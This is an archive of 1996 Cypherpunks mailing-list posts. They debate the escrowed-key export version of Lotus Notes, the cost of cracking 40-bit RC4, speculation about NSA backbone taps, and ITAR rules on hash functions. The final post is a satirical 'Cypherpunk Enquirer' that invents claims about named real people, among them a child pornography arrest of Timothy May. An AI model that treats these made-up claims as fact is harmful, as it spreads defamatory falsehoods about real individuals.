From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 21 Jan 1996 04:50:25 +0800
To: cypherpunks@toad.com
Subject: Re: Espionage-enabled Lotus notes.
Message-ID: <199601200403.UAA01951@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:16 PM 1/18/96 -0500, "Richard Martin" <rmartin@aw.sgi.com> wrote:
>The Lotus `solution' seems to be the action of an American company
>shipping a product which effectively says to foreign users, "We don't
>care about you as a market."

To play Sternlight's Advocate for the moment, I'll have to disagree 
with you here.  40-bit encryption really is a joke, for any business data
worth protecting (and Lotus Notes is primarily a business product.)
64-bit RC4 encryption, while less than ideal, is still usable
for most applications; it's certainly stronger than DES by a couple
orders of magnitude, which is probably enough for now.
Yes, the Yanquis can wiretap you, but it's better than having
_everybody_ wiretap you.  (And besides, you're probably going to
use the 128-bit smuggled version anyway.)  This at least provides
a product you can use with _some_ credibility, assuming it
interoperates with the US version, which I think the 40-bit version did.

>That this is the so-called "export"
>version is ironic. The keys are escrowed with the U.S. government,
>and no one else. The French government should rightly cry foul, for
>this is (a) encryption where they don't have the keys and (b) encryption
>where another government *does*.

The French can still ban it, or require you to register your keys,
just as they can with the 40-bit version.  Or ban products with
menu items in English, if they think that's too encrypted for them. :-)
C'est la guerre.
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "Eternal vigilance is the price of liberty" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 21 Jan 1996 04:41:21 +0800
To: cypherpunks@toad.com
Subject: Re: "whom T. C. May has killfiled"
In-Reply-To: <ad25a2a70202100433dd@[205.199.118.202]>
Message-ID: <Pine.ULT.3.91.960119195341.468X-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 19 Jan 1996, Timothy C. May wrote:

> At 11:09 PM 1/19/96, Rich Graves wrote:
> 
> >T. C. May has killfiled.
>  ^^^^^^^^^^^^^^^^^^^^^^^
> 
> ???
> 
> Mind explaining this reference? In public, preferably, as the charge was
> made here.
> 
> If it's a joke, I don't get it.

I just spent several minutes on a longer response, but on second thought I
think it suffices to say publicly that this was a particularly elliptical
joke, not at Tim's expense, that I retract and apologize for. And I've
received other mail that suggests that my primary assumption was wrong
anyway, about which I'm happy. 

I hadn't meant to post that paragraph publicly anyway, since it was a
stupid bluff. Oops. I've verified that it didn't go the other places I'd
sent a version of the article. 

And now back to our regularly scheduled programming...

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Sat, 20 Jan 1996 12:50:24 +0800
To: "cypherpunks@toad.com>
Subject: RE: Cypherpunk Enquirer
Message-ID: <01BAE6AE.99B23140@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


Hee-hee-hee-haa-haa-haaaaaaa.   
The UpYours CPunk News Update.

   ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Fri, 19 Jan 1996 19:11:02 +0800
To: zoo@armadillo.com (david d `zoo' zuhn)
Subject: Re: Ozzie Apes Jim Clark, Fix Is In to Cave and Cry
In-Reply-To: <199601182115.PAA10170@monad.armadillo.com>
Message-ID: <199601190944.UAA17814@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello "david d `zoo' zuhn" <zoo@armadillo.com>
  and wendigo@pobox.com (Mark Rogaski), cypherpunks@toad.com
 
...
> // : >of those bits by using a special 24-bit key supplied by the
> 
> // That was the question that came to mind when I read the article, too.
> // How exactly are they planning on implementing this?  
> 
> Looks straightforward to me.  Any time a bulk key is generated (aka session
> key), take a known number of bits in a known location (top n or bottom n)
> and encrypt those with the public key of the agent you want to give the n
> key bits to. 
...

Not so easy - as somebody pointed out in another thread, this will be 
very easy to brute - only 2^24 cleartexts to try...

You have to put in some salt to prevent this.

If you want the recipient to be able to check that the key is correctly
there, you need to make the salt known to both (eg a 1-way hash of the 
whole key). You might want to do this to make the program refuse
to interoperate with hacked versions.

...
> Neither give away the entire key directly, so it's not a trivial decoding
> operation.  But 40 bits isn't terribly difficult to decode either.
> 
> The advantage, as seen by many people, is that the full key is much larger
> in the Notes implementation style so non-governmental attackers have a much
> harder problem to solve in order to crack the message.  
...

I suppose it'll be safe for a while yet (esp. for session keys), but
has anyone multiplied that graphics-workstation-40bit price by 2^24?
It's only 10 billion! (billion=10^9) A lot of money, sure, but given
that it's not very expensive to go to 128 bits or more, why ???

(Please, do NOT post c*nspiracy theories --- they are obvious to everyone
and therefore unpatentable.)

...
> GAK is reasonable, to those who trust the government.  Now the subset of
> this list who do so may be a much smaller percentage than the subset of the
> VPs of IS that do.  But that's a different message.  
...

Now how about the percentage of *foreign* people who trust the US govt.?
Given that it has said that it'll spy commercially... (if memory serves).


Hope I'm making sense... (well, they say "hope dies last"...)

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMP9n2ixV6mvvBgf5AQEmYAQAuaEVsUgZ/W5FwMC9gJdLUN73UTi4A+ur
KE32A3sQrlC0yFIkRgfjusRu7emJQjlTphJVX/Zwb4l4nwF+1eDpstELL9ccKpW2
E+hvLF2Qn8mqdTFnkHWKAvAqGUcNFm8thPcDzmgGnKMFGODZJnNyI/DfgikLzdQw
asjL5+/9RWs=
=2K0T
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 20 Jan 1996 11:56:55 +0800
To: Rich Graves <cypherpunks@toad.com
Subject: "whom T. C. May has killfiled"
Message-ID: <ad25a2a70202100433dd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:09 PM 1/19/96, Rich Graves wrote:

>Yusuf's statement that my January 16th email is the first that he had
>heard of the .PWL problem is both patently ridiculous and directly
>contradicted by private email from anonymous sources on this list whom
>T. C. May has killfiled.
 ^^^^^^^^^^^^^^^^^^^^^^^

???

Mind explaining this reference? In public, preferably, as the charge was
made here.

If it's a joke, I don't get it.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Sat, 20 Jan 1996 10:28:21 +0800
To: <cypherpunks@toad.com
Subject: Re: Hack Lotus?
Message-ID: <9601200158.AA07776@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Phill writes:
> 
> I've been thinking about how I would do the lotus hack. I certainly would not be 
> wanting to do a public key operation for the benefit of the government on every 
> message. How about the following:
> 
> During installation of program: 
> Select a random key ER, encrypt it under the govt. public key to give Eg(ER). 
> To start encrypting,
> 
> chose a random value R, encrypt under destination public key to give Ek(R)
 
> set 40 bits of R to 0 to produce R' 
> Encrypt R' under ER to give E-ER(R')
> Hash R, E-ER(R') and Eg(ER) with a one way function (MDMF like) to produce the 
> actual key. 
> Send across Ek(R), E-ER(R'), Eg(ER) 
> To decrypt the message one needs the information for the escrow authority.
> 
> 		Phill

Wouldn't this interoperate only with other systems which had a similar setup? I suspect
the Lotus wants the US-Domestic and the International versions to interoperate
transparently, including with  their older versions.

Kaufman describes the encryption setup of Notes in moderate detail on pages 448-454
of 'Network Security'. It's a typical mixed system, with a secret key encrypted under the
recipient's Public key (a short one or a long one, depending on the local of the 
recipient and/or sender).

I suspect that Lotus has not completely reworked it's security system for the 
international version, and that they are in fact doing a second public key operation on 
the 3 bytes of GAK'd data.

If they're nasty, they'll check on the receiving side as well, to ensure that the LEAF 
and/or the espionage-enabling key have not been patched in the sending 'International'
version.

Peter Trei
trei@process.com


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Sat, 20 Jan 1996 10:42:52 +0800
To: alanh@infi.net (Alan Horowitz)
Subject: Re: NSA vacuuming down Internet traffic
In-Reply-To: <Pine.SV4.3.91.960119124825.19718A-100000@larry.infi.net>
Message-ID: <9601200206.AA22470@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


	Alan Horowitz asks ...
> 
> If I were standing in one of the places where NSA has it's taps of the 
> Net - what would I see? Alligator clips across terminal strips, leading 
> to a bunch of T3 lines?
> 

	I can't say I have a reliable answer to your question (although
I can say fairly confidently that it is unlikely to be done with alligator
clips at T3 and Sonet rates).

	In the past a good bit of this stuff was apparently done by
intercepting microwave tail circuits (such as on the older FDM type
undersea cables).  For some random reason all the traffic on the
undersea cable just happened to always be routed via a microwave link
(sometimes as a "backup" to a cable link sent to a satellite ground
station in case it had to carry the traffic if the cable failed).    
It is remarkable how many of the undersea cable terminals have microwave
links to the rest of the world.  

	Now with everything digital and almost always on fiber, one
would probably expect that the main Internet backbone Sonet or FDDI
rings have little diversions or bridges that feed undocumented fibers
going somewhere that nobody at the carriers quite knows where.  There is
a great deal of dark fiber installed (around the Beltway area
especially) for the spook agencies that was put in without any normal
cable records being kept by the carriers regarding where the fibers in
the bundle terminate or what they are used for or even where the actual
cables really go.  The amount of fiber going into some of the beltway
CIA sites is truly impressive (several major runs).

	The DACS digital crossconnect points (high speed space/time
division DS-1/DS-3 switches used for routing and and interconnecting digital
circuits from one fiber pipe to another) could certainly be programmed 
to route a copy of the traffic on some interesting backbone T3 line
out another port as well - and like all complex software driven devices
this capability could be covertly activated and controlled without notice to
the normal operators who certainly don't have source code or the 
expertise to vet it.

	As one might expect I've so far not met anyone at a carrier
who knows exactly where the NSA taps are, but other possibilities
certainly exist at repeater sites (where used) and even by optical
taps (bending the fiber to make it leak a little light) in some 
manhole somewhere.   And obviously buggering the firmware in central
routers to forward selected packets is available as a last ditch option.

						Dave





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 20 Jan 1996 10:58:12 +0800
To: trei@process.com
Subject: Re: Hack Lotus?
In-Reply-To: <9601200158.AA07776@toad.com>
Message-ID: <199601200222.VAA01246@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Peter Trei" writes:
> I suspect that Lotus has not completely reworked it's security
> system for the international version, and that they are in fact
> doing a second public key operation on the 3 bytes of GAK'd data.

Likely.

> If they're nasty, they'll check on the receiving side as well, to
> ensure that the LEAF and/or the espionage-enabling key have not been
> patched in the sending 'International' version.

Nearly impossible. Why? Because they can only include the public key,
and not the private key, of the GAK authority in the code. You can
encrypt the three bytes of key, but it is very hard for a receiver
other than the govvies to read them. There is no shared secret
information or private information available, ergo, they can't check
their LEAF equivalent.

This is likely where the flaw in the scheme is -- it should be trivial
to drop another public key in place of the government one and foil the
entire thing with minimal effort. All will look normal until someone
tries to use the GAK private key.

Of course, I'll point out that 64 bit RC4 keys are still not
particularly heartwarming...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Sun, 21 Jan 1996 04:47:20 +0800
To: cypherpunks@toad.com
Subject: Re: Respect for privacy != Re: exposure=deterence?
Message-ID: <ad25c3ad000210040d90@[132.162.233.188]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:03 PM 01/19/96, Rich Graves wrote:

>I'll certainly grant you that there is a conspiracy and a secret
>government (broadly defined), but not everyone paid by the government is
>in on it, and not everyone involved is in the government.

Nah, many conspiracies.  Lots of government folks doing their own secret,
non-secret, and semi-secret stuff in cooperation with other government
folks and non-government folks.  Adam Smith either said, or is frequently
misquoted as saying, that whenever two business people of the same
profession meet, it's a conspiracy.  That goes double for two government
agents.  [What's a double conspiracy?  You'd know if you were in on it.]

>Gratuitous use of pseudonymity can be counterproductive. Now nobody's
>going to be able to use your "bar-coded garbage" essay without being
>suspected of being you, which I doubt is what you want.
>
>Is anyone going to quote you in the future, as you quote Patrick Henry?

Or as everyone quotes Publius?  Who is Publius anyway?  Alexander Hamilton
or Tom Jefferson, or someone like that, I forget.   Would they quote
Publius if they never figured out who "really" wrote Publius' stuff?  I
dunno. Maybe eventually we'll know who We Jurgar Din "really" is.  But
probably not, becuase we won't even remember what he wrote, let alone be
interested in who he "really" is.

And I guess everyone doesn't quote Publius anyway.  But every American
Constitutional Law textbook probably does, and most American History
textbooks.  Maybe future American Bar Code textbooks will quote We Jurgar
Din.  Somehow I doubt it, though.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Sat, 20 Jan 1996 11:51:46 +0800
To: <trei@process.com
Subject: Re: Hack Lotus?
Message-ID: <9601200326.AA09366@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> "Peter Trei" writes:
> > I suspect that Lotus has not completely reworked it's security
> > system for the international version, and that they are in fact
> > doing a second public key operation on the 3 bytes of GAK'd data.
> 
> Likely.
> 
> > If they're nasty, they'll check on the receiving side as well, to
> > ensure that the LEAF and/or the espionage-enabling key have not been
> > patched in the sending 'International' version.
> 
> Nearly impossible. Why? Because they can only include the public key,
> and not the private key, of the GAK authority in the code. You can
> encrypt the three bytes of key, but it is very hard for a receiver
> other than the govvies to read them. There is no shared secret
> information or private information available, ergo, they can't check
> their LEAF equivalent.

Think it through. 

1 Alice generates session key K
2 encrypts with Bob's public key, producing Epb(K)
3 extracts 24 bits of K to make K'
4 encrypts with Eve's (spy) public key, producing Epe(K')

5 encrypts message under K, producing EsK(M)

6 sends EsK(M), Epb(K), Epge(K') to recipient (and possibliy Eve)

7 Bob's copy of lotus decrypts Epb(K), recovering K

8 Bob's copy of lotus repeats steps 4 & 5 above, and checks if
   it's version of Epe(K') matches the one sent. 

9 If it does,  decrypt EsK(M), and give it to Bob
   If it does not,  send a copy to the NSA, blowing the whistle on 
   Alice, who's running a hacked copy. 

Thus, you can prevent a non-complying copy  of Lotus from talking to 
a complying copy of Lotus, which is one of the goals of the GAKers.

> This is likely where the flaw in the scheme is -- it should be trivial
> to drop another public key in place of the government one and foil the
> entire thing with minimal effort. All will look normal until someone
> tries to use the GAK private key.

> Of course, I'll point out that 64 bit RC4 keys are still not
> particularly heartwarming...

Granted, but we don't know if they use RC4, DES, or what.

> Perry

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@alpha.c2.org (Anonymous)
Date: Sat, 20 Jan 1996 15:26:18 +0800
To: tcmay@got.net
Subject: Re: "whom T. C. May has killfiled"
In-Reply-To: <ad25a2a70202100433dd@[205.199.118.202]>
Message-ID: <199601200711.XAA12262@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May (tcmay@got.net) wrote:
: At 11:09 PM 1/19/96, Rich Graves wrote:
: 
: >Yusuf's statement that my January 16th email is the first that he had
: >heard of the .PWL problem is both patently ridiculous and directly
: >contradicted by private email from anonymous sources on this list whom
: >T. C. May has killfiled.
:  ^^^^^^^^^^^^^^^^^^^^^^^
: 
: ???
: 
: Mind explaining this reference? In public, preferably, as the charge was
: made here.
: 
: If it's a joke, I don't get it.


You killfiled microsoft.com, remember?  sheez...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 20 Jan 1996 14:03:38 +0800
To: cypherpunks@toad.com
Subject: The Lotus Position
Message-ID: <ad25b8e8050210046e54@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:03 AM 1/20/96, Bill Stewart wrote:

>40-unknown-bit RC4 may take a week for an ICE workstation or a herd of
>net-coordinated workstations, but it would be much faster to crack on
>a specialized machine actually designed for RC4.  I think Eric's estimate
>was $25-50K for a machine that could do it in 15 minutes, built out of
>programmable gate arrays.  That's not $10,000/crack, or $584, but $0.25-.50.
>Would they crack all the keys they wanted for a quarter each?  Sure;
>at that rate it's probably cheaper to crack them than read them
>(though in reality they'd feed most of them to keyword scanners.)

I take it as self-evidently true that NSA would spend the relatively small
amount of money to build a dedicated key cracker...probably at least
several for each major cipher. "In this room, where we used to have the
famed acre of Crays, now we have tenth of an acre of superfast custom key
crackers."

(Yes, I know the Crays are used for other things besides key cracking. In
fact, their main use probably is not for crypanalysis. Also, I'm not
talking about cracking ciphers that are essentially uncrackable with any
amount of compute power, I'm talking about cracking specific instances of
ciphers with NSA-approved key lengths.)

To consider just how _cheap_ such a dedicated machine is to them, consider
that in the late 50s and early 60s they built the "Harvest" machine, in
conjunction with IBM and based to some extent on IBM's "Stretch" machine,
as I recall. (Bamford has a bunch of stuff on it, and our own Norm Hardy
worked on it for IBM in the early 60s...he gave a good talk at a
Cypherpunks meeting on how big it was, how much it cost, its capabilities,
etc.)

The Harvest machine, and its ancillary units, such as the world's largest
and fastest tractor tape drive, cost something like $100 million in today's
dollars, according to Norm and others. And Harvest was still running in
1975-6, when it was finally replaced by the Cray 1. NSA also funded the
early efforts that later became Control Data Corporation (CDC), and NSA was
a major customer of Seymour Cray's CDC 6600, and the later 7600 (and maybe
even the ill-fated Star). NSA and AEC were also the early customers for the
Cray-1, of course.

This gives you some feel for what kind of expenditures "the Fort" is
prepared to make when it sees the need. And the black budgets of other
intelligence agencies, as described in Richelson's excellent books and
other books (such as "Deep Black," an unauthorized history of the National
Reconnaissance Organization), can only be described as "stupefyingly
large." A surveillance satellite can run upwards of $1.5 billion, so
spending a tiny fraction of that to decrypt what you've sniffed out of the
airwaves is a gimme.

The deep black budget is estimated to be something like $25 billion a year.

Recall that the Wiretap Bill _alone_ provided for up to $500 million for
compliance measures. Clearly the FBI somehow view their surveillance
capabilities as being worth at least this much to them, and probably a lot
more.

Throw in the budgets for the DEA, IRS, FinCen, FBI, BATF, and all the other
agencies fighting the Four Horsemen and the citizen-units who stray outside
the drawn lines, and it's clear that NSA could budget several hundred
million dollars *each and every year* for breaking its "approved ciphers."

Like many, I take it for granted that 40-bit RC4 can be broken for "small
change." Moreover, my guess is that foreign traffic is routinely cracked if
it is encrypted. After all, it's the encrypted traffic that is likeliest to
be interesting. (Sure, some dumbos like Pablo Escobar speak in the clear on
cellphones, but the correlation is definitely in the direction of encrypted
traffic being likelier than unencrypted traffic to contain interesting
stuff. This will become even more the case as more people become educated
and as crypto gets built into more things...this is the intelligence and
law enforcement communities' worse nightmare.)

A $25,000 machine. 4 cracks per hour, 100 per day, and 36,000 per year.
Running for an active life of several years (before being replaced, of
course, by something several times faster/cheaper), there you have the
$0.25 per crack that Bill cites above. Even at 100 times this estimate,
it's cheap. (Not for random vacuuming, but for anything targetted, even
casually.)

And think of what just a few percent of the "Harvest" budget buys you: 100
of these machines. Several million cracks per year. And from these cracks,
think of the correlations, the contact lists, and the further targetting
that can be done.

[Sidebar: One thing that bothers me about any of these LEAF-related
schemes--and I don't know if and how the Lotus scheme checks both ends for
compliance, etc.--is that they are fundamentally at odds with remailers
which hide the origin. If remailers are allowed to continue to exist,
schemes involving LEAF fields won't work. Unless I've forgotten how these
things work in the couple of years since I last looked at Clipper et. al.
in depth. So, I expect a move against remailers as part of the campaign.
And with no remailers, if this could ever be enforced, the ability to make
contact lists based on random decryption is frightening.]

Back to their 100 machines....

My guess is that they haven't even bothered to buy this many machines, that
the intelligence they get from a few tens of thousands of cracks is more
than enough to point to further leads, to trigger additional HUMINT, etc.

But even if the estimates are off by orders of magnitude, we know that a
40-bit RC4 can be cracked in ~hours with ~hundreds of Sun-class machines.
(Personally, I think it obvious the NSA has at least speeded up this work
factor by at least a factor of ten.) This is also essentially a minor
consideration compared to the amount of work done in ordinary wiretaps.

And in a few years, 40-bit RC4 will be even more ludicrously weak.

The Lotus position is untenable.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Sat, 20 Jan 1996 12:38:42 +0800
To: cypherpunks@toad.com
Subject: What news along the Rialto?
Message-ID: <Pine.3.89.9601192337.B12016-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



   Well, we're waiting. . .
   Those of us who didn't make it to the RSADSI conference are
   anxious to hear interesting tales of the Left Coast & crypto.
   One need not have the stylistic piquancy of John Young; one
   need only type up one's notes, optionally sign the missive,
   and mail or remail on to the list, posterity, and the Hoover
   Palace.

   I think maybe Bob H. went[?]; he e$pammed a press release
   from Florida's own Fischer Int'l. Sys. Corp. re: SmartDisk,
   which isn't really news, having been out for quite some time.
   When I first saw it, I smacked my forehead sharply with my
   open hand and said, "Exon the Contented Catamite! Why didn't
   I think of that?"   I hope they sell a million of them.

   Any news from field agents appreciated.

   Any news from RSADSI re: prices and availablity of videos,
   etc., is also OK as far as I'm concerned.
   --
   pj
   Defending the home, regret vanishes. - 19Jan96@I_Ching.tao
   p.s. noise.sys is neato! Thanks, Robt. Rothenburg Walking-Owl
   and funet.fi folks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 20 Jan 1996 16:13:13 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199601200759.XAA17860@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I know this is a little off-topic, but does anyone know of a good swap file deleter?  I know Real Delete is a good program, but I want something I can call in a batch file after windows to automatically do a secure wipe of the permanent swap file and then replace it.  I have heard of a couple programs but I am not sure about their reliability.  Any pointers to a good program would be appreciated.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@unix.ka9q.ampr.org>
Date: Sat, 20 Jan 1996 19:30:49 +0800
To: cypherpunks@toad.com
Subject: ITAR and hash functions (Perry's question)
Message-ID: <199601201124.DAA09482@unix.ka9q.ampr.org>
MIME-Version: 1.0
Content-Type: text/plain


Perry quoted part of the joint declaration of facts in my case and asked

>Would this not mean that the government is estopped from ever again
>claiming that hash functions are export controlled under the ITAR?

Not according to them. They have made it clear throughout their
filings that they consider each CJ request on a case-by-case basis.
Furthermore, they repeatedly assert that under the power delegated to
them by the President, they have the absolute power to add and delete
items from the Munitions List and to make inexplicable, inconsistent
and arbitrary rulings whenever they damn well feel like it, and no
court can overrule them.

They even feel free to ignore their own rules whenever they get too
inconvenient. See my attorneys' brilliant analysis of why the ITAR as
written clearly permits the export of public domain crypto code under
the public domain exemption. It's about halfway through

http://www.qualcomm.com/people/pkarn/export/karnresp.html

But State wrote the rules, so they can ignore 'em whenever they feel
like it. Why gosh, National Security is at stake! And that's something
we mere mortals can't possibly know anything about.

Grep for the word "estoppel" in their arguments -- I know they used it
at least once to discuss this exact point.

So the bottom line is this: at the moment the ODTC will let you export
hash functions as long as they don't encrypt data. They'll probably
grant CJ requests to that effect. But they could change their minds at
any time if they feel like it.

Isn't it wonderful to live under a government of laws, not of men?

Phil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Sun, 21 Jan 1996 15:50:08 +0800
To: cypherpunks@toad.com
Subject: Web site with Updated Telecom Bill Info
Message-ID: <Pine.SUN.3.91.960120035943.5783A-100000@hertz.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



http://bell.com/ (Alliance for Competitive Communications) has updated 
Telecom Bill info including "A concise resource guide to the House Senate
Conference on H.R. 1555/S. 652.", 12/22/95 draft of the Telecommunications 
Conference Bill, and a statement by VP Gore.  (Beware of editorial bias
at this site, as these people are not a disinterested party).

Our beloved Vice President said: "We are very gratified that the bill
contains the provisions for the V-chip that will enable families to
control the contract of television programming that comes into their homes
and that it contains a provision to make advanced telecommunications
services available at low cost to schools, libraries and hospitals" 

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Sun, 21 Jan 1996 15:06:32 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: NSA vacuuming down Internet traffic
In-Reply-To: <199601190923.KAA10526@utopia.hacktic.nl>
Message-ID: <199601200205.EAA07759@trance.olari.clinet.fi>
MIME-Version: 1.0
Content-Type: text/plain


> Is there any open source - or otherwise - knowledge or speculation about
> which words/phrases the Terra-cycle cpu's are text-searching *for*?  If it
> were your responsibility to eavesdrop on Iranian terrorists - or French
> Commercial Attache reports to Paris - or to have UK nationals, off in
> their private room of your building, write down the name of every in
> America who expresses a libertarian dissatisfaction with the Republicrat
> regime - would you know for sure which words/phrases to key on?   It 
> doesn't sound like a tractable problem to me.

To me it does sound completely feasible (you don't need very good
accuracy).  I've personally run packet filters (for statistical
purposes only) on busy 10-mbit ethernets using BPF, FreeBSD, and 486
or pentium machines.  They easily keep up with little packet loss.

I understand T3 is 34 mbits, so only three times faster.  No problem
to optimize that much by specially written software, especially if you
can do some of the low level stuff in hardware.

As for the keyword search problem, it would easily be possible to scan
much of the data (say, tcp ports smtp, nntp, login, exec, ident) in
real time against a million-phrase dictionary (containing keywords,
e-mail addresses, names, abbreviations, etc.).  If there are
performance problems, you can first limit by
source/destination/protocol/port.  Only intercepts (e.g., entire tcp
connections) that pass this initial screening are passed on to other
machines for more complicated analysis.

Note also that many parts of the filtering problem parallelize quite
nicely.  For example, you can split the traffic to a number of
machines based on the value of the numerically smaller of the
source/destination addresses.

I don't see any technical problems in doing large-scale internet
monitoring.  The equipment needed is even cheap enought to be done by
motivated amateurs/individuals, assuming they can get a copy of the
raw data from the T3.

This is one of the reasons why strongly encrypting internet data is so
important.

    Tatu

See http://www.cs.hut.fi/ssh for information on SSH, the secure remote
login program.

See http://www.cs.hut.fi/crypto for information cryptography available
to anyone worldwide.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Sat, 20 Jan 1996 12:19:16 +0800
To: cypherpunks@toad.com
Subject: Cypherpunk Enquirer
Message-ID: <199601200350.EAA12520@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


			THE CYPHERPUNK ENQUIRER

                   "Encyphering minds want to know."


Lotus Development, a division of IBM, today announced a new, "international"
version of its popular "Lotus Notes" program.  The new program features,
in addition to the standard 40 bit RC4 encoding allowed in exportable
software by the ITAR, the use of the proven Unix (tm) encryption program,
ROT 13.  "Now our international customers can use the same, tamper-proof
encryption standards that our domestic customers already enjoy," stated
an IBM spokesperson, who was reportedly whisked to the Mayo Clinic for
nose reduction surgery.  In related news, the International Society for
the Prevention of Cruelty to Animals announced that the new Lotus Notes
International does allow the snakes to move more easily and freely, and
that it virtually eliminates that irritating squeaking sound when they
shed their skins.

In related medical news, proctologists at the Bethesda Naval Clinic reported
that, despite 12 hour emergency surgery, Louis Freeh's head remains firmly
stuck.  The Center for Disease Control in Altanta has also reported that
Mr. Freeh's condition is evidently highly contagious, as he has reportedly
infected noted cryptographic researcher Dorothy Denning during a late night
strategy session in Washington.  CDC spokespersons also recommended that
people avoid personal contact with David Sternlight for at least the next
48 hours.

The FBI today announced the arrest of Timothy May on child pornography 
charges after an unnamed 13 year old FBI informant downloaded a .GIF of
Mr. May naked in a hot tub at a recent 'cypherpunks' Christmas party.  Mr.
May, who is already under investigation by the SEC in the Netscape stock
manipulation scandal, has referred all questions to his attorney.  The FBI's
attention was apparently drawn to the case when the 13 year old informant
in question was heard to exclaim, "What's this naked hippie doing in my
Penthouse downloads?"

Matt Blaze today announced a new Random Number Generator based on President
Clinton's Bosnia policy speeches of the last year.  Mr. Blaze stated that
each of the President's speeches was yielding at least 1024 bits of pure
entropy, and that when added to the 512 bits of entropy found in each of
Speaker of the House Newt Gingrich's policy papers on the Internet, should
be enough to encypher an average household's grocery shopping over the
Internet for at least a month.

In related RNG news, University of California at Berkeley officials today
confirmed that the campus's new symbol, the glow-in-the-dark Campanile, was
actually the result of graduate student Ian Goldberg's attemps to hook the
Lawrence Laboratory Bevatron up to his Unix workstation to use as a Random
Number Generator.

Noted anti-conspiracy lecturer Perry Metzger was hired today by Hillary
Clinton's defense team.  "He's done a great job on cypherpunks, let's see
what he can do with the U.S. Senate," one of her lawyers stated at today's
press conference.

Jeff Weinstein of Netscape Communications today announced the long awaited
128 bit RC4 encryption Netscape Navigator for the Linux operating system.
The new kit, consisting of a standard 2.05b binary, a disassembler, and
a copy of "The C Programming Language" by Kernighan and Ritchie, should be
available later this week.  "This new kit should enable the average Linux
user to enjoy the same level of Internet security that our Windoze users
